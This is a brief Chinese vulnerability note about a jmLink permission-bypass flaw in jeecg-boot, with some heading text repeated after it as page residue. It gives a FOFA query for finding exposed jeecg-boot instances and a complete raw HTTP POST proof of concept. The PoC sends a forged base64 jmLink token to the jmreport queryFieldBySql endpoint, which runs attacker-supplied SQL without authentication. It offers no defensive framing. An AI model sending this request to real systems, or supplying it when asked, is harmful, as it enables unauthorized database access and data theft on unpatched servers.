jeecg-boot系统接口jmLink权限绕过漏洞

fofa

body="jeecg-boot"

poc

POST /jeecg-boot/jmreport/queryFieldBySql?previousPage=xxx&jmLink=YWFhfHxiYmI=&token=123123 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/json
Cache-Control: no-cache
Pragma: no-cache
Host: 192.168.131.100:8088
Content-Length: 21
 
{"sql":"select '1' "}

漏洞来源

https://blog.csdn.net/LiangYueSec/article/details/140840776

jeecg-boot系统接口jmLink权限绕过漏洞

fofa​

poc​

漏洞来源​

fofa

poc

漏洞来源